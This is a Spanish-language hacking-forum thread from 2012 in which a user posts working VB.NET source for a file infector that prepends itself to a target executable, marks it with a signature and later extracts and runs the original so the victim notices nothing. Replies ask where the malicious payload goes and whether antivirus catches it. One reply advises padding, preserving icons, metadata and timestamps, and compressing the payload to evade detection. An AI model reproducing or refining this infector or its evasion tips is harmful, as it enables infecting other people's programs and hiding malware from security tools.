elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP) (Moderador: kub0x)
| | | |-+  [Spreader] Infectar ejecutables VB.NET
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [Spreader] Infectar ejecutables VB.NET  (Leído 12,162 veces)
kub0x
Enlightenment Seeker
Moderador
***
Desconectado Desconectado

Mensajes: 1.486


S3C M4NI4C


Ver Perfil
[Spreader] Infectar ejecutables VB.NET
« en: 30 Abril 2012, 05:37 am »

Qué tal andamos?

Bueno, hace días que llevo programando una cosilla (bla bla) y necesitaba que mi código se ejecutara en otros procesos, para ello agrego mi código al principio de un nuevo ejecutable y después el del archivo a infectar. Hasta ahí bien, pero ¿qué sucede si la víctima abre el archivo infectado? ¿Estará corrupto? Nada de eso, se ejecutará mi código. El original seguirá en el ejecutable infectado pero no correrá.

Como al inicio de la aplicación comprobamos si existe la firma en el archivo infectado miramos si es así entonces abrimos el archivo infectado y llenamos un Buffer con los datos de éste. Después, como sabemos la longitud de los datos de nuestro programa, en función de ésta seremos capaces de extraer los bytes de la aplicación original.

Funciona a la perfección. Me gustaría que me dierais vuestra opinión, no estaría de más mejorar el código.

Código
  1. Private Sub Infectar_EXE(ByVal Rutas As Object())
  2.        Try
  3.            Dim Ruta_Archivo As String = CType(Rutas(0), String) 'declaramos las rutas..
  4.            Dim RutaHost As String = CType(Rutas(1), String)
  5.            Dim fs As New FileStream(Ruta_Archivo, FileMode.Open, FileAccess.Read) 'abrimos nuestra copia
  6.            Dim size As Long = fs.Length 'obtenemos los datos de nuestra copia
  7.            Dim Buffer(size) As Byte 'declaramos un Buffer que tendrá como tamaño los datos de nuestra copia
  8.            Dim firma As Byte() = Encoding.Default.GetBytes("Firma") 'Preparamos la firma para escribirla/buscarla en el Buffer
  9.            fs.Read(Buffer, 0, Buffer.Length) 'escribimos en el Buffer actual los datos de la copia
  10.            fs.Close()
  11.            Kill(Ruta_Archivo) 'eliminamos la copia
  12.            fs = New FileStream(RutaHost, FileMode.Open, FileAccess.Read) 'apuntamos al archivo que se generará..
  13.            size += (fs.Length) 'obtenemos el nuevo tamaño para el Buffer (longitud de los datos de nuestro progama + long. datos del programa Host)
  14.            Dim offset As Long = size - fs.Length 'obtenemos los datos de la copia (Repetido pero necesario)
  15.            If IndexOf(Buffer, firma) = -1 Then 'Si la Firma NO ESTÁ en la copia...
  16.                Array.Resize(Buffer, size) 'Modificamos el tamaño del Buffer en función de la variable Size
  17.                fs.Read(Buffer, offset, fs.Length) 'Llenamos el Buffer
  18.                fs.Close()
  19.                Kill(RutaHost) 'Eliminamos el archivo
  20.                fs = New FileStream(RutaHost, FileMode.Create, FileAccess.Write)
  21.                fs.Write(Buffer, 0, Buffer.Length) 'Guardamos un nuevo archivo que será el nuestro Infectado
  22.                fs.Write(firma, 0, firma.Length) 'Le añadimos la Firma al final
  23.                fs.Close()
  24.            Else
  25.                'Como hemos encontrado la Firma entonces..
  26.                fs.Close()
  27.                Ejecutar_Hostage(RutaHost, Buffer, 17920, Buffer.Length - 17920) 'Generamos el archivo Original y lo ejecutamos
  28.            End If
  29.        Catch ex As Exception
  30.            MsgBox(ex.Message)
  31.        End Try
  32.    End Sub
  33.    Private Sub Ejecutar_Hostage(ByVal RutaHost As String, ByVal Buffer As Byte(), ByVal offset As Long, ByVal Count As Int32)
  34.        Dim copia_temporal As New FileStream("C:\temporal.exe", FileMode.Create, FileAccess.Write)
  35.        copia_temporal.Write(Buffer, offset, Count)
  36.        copia_temporal.Close()
  37.        If Not Process.GetCurrentProcess.MainModule.FileName.Contains("Infectar Ejecutables") Then 'Si el nombre del Archivo que se ha ejecutado
  38.            'es distinto del que usamos para la infección
  39.            Process.Start("C:\temporal.exe")
  40.        End If
  41.    End Sub
  42.    Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
  43.        FileSystem.FileCopy(Process.GetCurrentProcess.MainModule.FileName, "C:\copia.exe") 'nos copiamos en C:\
  44.        Dim Obj() As Object = {"C:\copia.exe", "C:\archivo.exe"} 'inicio un array que contendra las rutas de los archivos
  45.        Dim ThreadInfectar As New Thread(AddressOf Infectar_EXE)
  46.        ThreadInfectar.Start(Obj) 'iniciamos un nuevo hilo pasandole las rutas
  47.    End Sub
  48.    Private Function IndexOf(BuscarEnArray As Byte(), EncotrarBytes As Byte()) As Integer
  49.        'buscamos en el Buffer la Firma
  50.        Dim encoding__1 As Encoding = Encoding.GetEncoding(1252)
  51.        Dim buscar As String = encoding__1.GetString(BuscarEnArray, 0, BuscarEnArray.Length)
  52.        Dim encontrar As String = encoding__1.GetString(EncotrarBytes, 0, EncotrarBytes.Length)
  53.        Dim result As Integer = buscar.IndexOf(encontrar, StringComparison.Ordinal)
  54.        Return result
  55.    End Function
  56.  

Poco tiene esto de Spreader, pero eso ya me lo guardo para mí jejeje.

Saludos.


« Última modificación: 30 Abril 2012, 20:26 pm por kub0x » En línea

Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate

$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: [Spreader] Infectar ejecutables VB.NET
« Respuesta #1 en: 30 Abril 2012, 16:40 pm »

Me vas a matar que nunca entiendo nada jaja pero no entiendo bien que hace.

Se copia a C:\copia.exe, saca los datos y lo mete en C:\archivo.exe, y luego si ejecutan archivo.exe se ejecuta la ultima parte, es decir el archivo.exe original :/ no entiendo bien, explicame si queres xD


En línea

kub0x
Enlightenment Seeker
Moderador
***
Desconectado Desconectado

Mensajes: 1.486


S3C M4NI4C


Ver Perfil
Re: [Spreader] Infectar ejecutables VB.NET
« Respuesta #2 en: 30 Abril 2012, 16:55 pm »

No vas mal encaminado :D Se autocopia la aplicación bajo Copia.exe para asi extraer los datos de nuestra aplicación. Luego abro archivo.exe que es el ejecutable a infectar, saco sus datos y los guardo en el array donde están los datos de nuestra aplicación. Entonces ya tenemos un array con los datos de ambas aplicaciones.. Le meto una Firma y creo el nuevo archivo bajo el nombre archivo.exe (el mismo que el del ejecutable anterior, para que la victima no sospeche).

Luego si el ejecutable tiene la Firma, entonces extraigo el ejecutable original temporalmente, así el usuario ejecuta nuestro código y el archivo original, para no levantar sospechas.

Saludos.
En línea

Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate

$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: [Spreader] Infectar ejecutables VB.NET
« Respuesta #3 en: 30 Abril 2012, 17:19 pm »

Y donde iria nuestro codigo? en Ejecutar_Hostage? podrias comentar eso, poniendo ' aca el codigo nuestro xD Y fijate que te equivocaste en el comentario de Si existe la firma o si no existe, eso me hizo confundir tambien xD

if ... "Si la firma esta en la copia.."

else
"Como hemos encontrado la firma"

El primero es ' Si la firma NO esta en la copia, creo por lo menos, si tengo razon ya entendi y ya he hecho cosas de estas, solo que .net lo hace todo mas facil, queda lindo xD Saludos
« Última modificación: 30 Abril 2012, 17:25 pm por $Edu$ » En línea

Maurice_Lupin


Desconectado Desconectado

Mensajes: 356

GPS


Ver Perfil WWW
Re: [Spreader] Infectar ejecutables VB.NET
« Respuesta #4 en: 30 Abril 2012, 18:43 pm »

Como no utilizo antivirus, me pregunto, lo detecta algún antivirus?

P.D : Estoy averiguando como cifrar el formato PE de los .exe de .net, para seguridad e impedir q sean detectables, si alguien tiene algun link o info q compartir, gracias.

Saludos.  ;D

En línea

Un error se comete al equivocarse.
kub0x
Enlightenment Seeker
Moderador
***
Desconectado Desconectado

Mensajes: 1.486


S3C M4NI4C


Ver Perfil
Re: [Spreader] Infectar ejecutables VB.NET
« Respuesta #5 en: 30 Abril 2012, 20:31 pm »

Y donde iria nuestro codigo? en Ejecutar_Hostage? podrias comentar eso, poniendo ' aca el codigo nuestro xD Y fijate que te equivocaste en el comentario de Si existe la firma o si no existe, eso me hizo confundir tambien xD

if ... "Si la firma esta en la copia.."

else
"Como hemos encontrado la firma"

El primero es ' Si la firma NO esta en la copia, creo por lo menos, si tengo razon ya entendi y ya he hecho cosas de estas, solo que .net lo hace todo mas facil, queda lindo xD Saludos

Gracias por fijarte, tienes razon en lo de la sentencia condicional:D El método Ejecutar_Hostage lo que hace es sacar el código de la aplicación original de la aplicación infectada. No sé si me explico a horrores, pero si es así recuerdamelo jajajaj.

Como no utilizo antivirus, me pregunto, lo detecta algún antivirus?

P.D : Estoy averiguando como cifrar el formato PE de los .exe de .net, para seguridad e impedir q sean detectables, si alguien tiene algun link o info q compartir, gracias.
Saludos.  ;D

El mío desde luego no, espero que dure tiempo sin ser "cazado". Por cierto, ¿podrias comentar algo sobre lo que estas buscando de cifrar el formato PE?

Saludos!
« Última modificación: 30 Abril 2012, 22:28 pm por kub0x » En línea

Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate

$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: [Spreader] Infectar ejecutables VB.NET
« Respuesta #6 en: 30 Abril 2012, 20:46 pm »

Si, desde Ejecutar_Hostage se ejecuta la aplicacion original si, pero la gracia es que ahi tambien se ejecute el codigo malicioso que pongamos no? sino cuando?
En línea

kub0x
Enlightenment Seeker
Moderador
***
Desconectado Desconectado

Mensajes: 1.486


S3C M4NI4C


Ver Perfil
Re: [Spreader] Infectar ejecutables VB.NET
« Respuesta #7 en: 30 Abril 2012, 22:32 pm »

Me cito a mi mismo:
Hasta ahí bien, pero ¿qué sucede si la víctima abre el archivo infectado? ¿Estará corrupto? Nada de eso, se ejecutará mi código. El original seguirá en el ejecutable infectado pero no correrá.

Es decir, el usuario abre el archivo infectado y lo que se ejecuta es nuestro código. Luego después como el método Ejecutar_Hostage está dentro de nuestro código, pues éste crea la aplicación original mediante la extracción de "n" datos.

Saludos.
En línea

Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate

Keyen Night


Desconectado Desconectado

Mensajes: 496


Nothing


Ver Perfil
Re: [Spreader] Infectar ejecutables VB.NET
« Respuesta #8 en: 30 Abril 2012, 22:49 pm »

Está bien como un ejercicio de práctica ;-)

En la práctica, si no corre el código del huésped. No sería más fácil colocar nuestro código primero y luego relleno hasta equiparar el tamaño del ejecutable original, manteniendo las propiedades del archivo (Iconos y propiedades generales: como descripción, compañía, versión, etc.) y el TimeSpan intacto, tratando de que el código infeccioso pese lo menos posible, o en un caso más avanzado empacando nuestro código con las clases de compresión que brinda .Net y un modulo que sea capaz de descomprimir y ejecutar el código en tiempo de ejecución. Otra cosa, te diré un truco por hay :xD en C++ creando una aplicación de Windows puedes borrar el código generado por el compilador para colocar tu código y se ejecutara sin ventanas de ningún tipo, en .Net también se puede hacer esto pero hay que seguir otros pasos, crea un proyecto de Console, te vas a las Propiedades del Proyecto y a la pestaña Aplicación donde colocaras Tipo de Aplicación: Aplicación de Windows Forms, y en la propiedad Objeto de Inicio: Sub Main, de está manera puedes crear un ejecutable que solo contenga el código sin más estorbos como la Consola o Windows Forms, finalmente una vez que lo generes puedes ahorrar algo de espacio usando alguna utilidad como ResourcesHack para borrar el icono, te digo esto porqué así ahorras mucho espacio que es algo critico a la hora de realizar procedimientos de este tipo. Espero que lo tomes ha bien :xD lo digo porqué hay gente que se ofende cuando uno habla mucho jajajajajajaja por el contrario si le dedique tiempo ha escribir este testamento es porqué me llamaron la atención tus intereses...
« Última modificación: 30 Abril 2012, 22:51 pm por Keyen Night » En línea

La Fé Mueve Montañas...
                                    ...De Dinero

La programación es más que un trabajo es más que un hobby es una pasión...
$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: [Spreader] Infectar ejecutables VB.NET
« Respuesta #9 en: 1 Mayo 2012, 00:44 am »

Me cito a mi mismo:
Es decir, el usuario abre el archivo infectado y lo que se ejecuta es nuestro código. Luego después como el método Ejecutar_Hostage está dentro de nuestro código, pues éste crea la aplicación original mediante la extracción de "n" datos.

Saludos.

Pero cual es "nuestro codigo" donde lo ponemos? no puedo hacer pruebas porque no tengo el Visual Studio.

Si ejecutamos este spreader.exe ya compilado no hara nada, ponele un ejemplo de un MessageBox que diga "Infectado" asi veo donde va el codigo que te digo, porque por ahora solo infecta pero no hace nada, no se si me entendes.
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Simple 'WLM' Spreader
Programación Visual Basic
illuminat3d 2 2,641 Último mensaje 18 Noviembre 2009, 18:05 pm
por illuminat3d
[Source] Kryptonite Spreader Version InfrAngeluX
Programación Visual Basic
BlackZeroX 2 2,368 Último mensaje 15 Diciembre 2009, 21:59 pm
por BlackZeroX
Spreader Facebook.
Ingeniería Inversa
Elemental Code 1 5,844 Último mensaje 21 Diciembre 2010, 02:26 am
por MCKSys Argentina
Spreader en pascal[APORTE]
Programación General
WarZ0n3 0 2,359 Último mensaje 15 Abril 2013, 00:10 am
por WarZ0n3
Spreader Crypter [USB Inf3ct] ByRoda
Criptografía
Roda 2 3,793 Último mensaje 10 Junio 2015, 00:13 am
por Roda
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines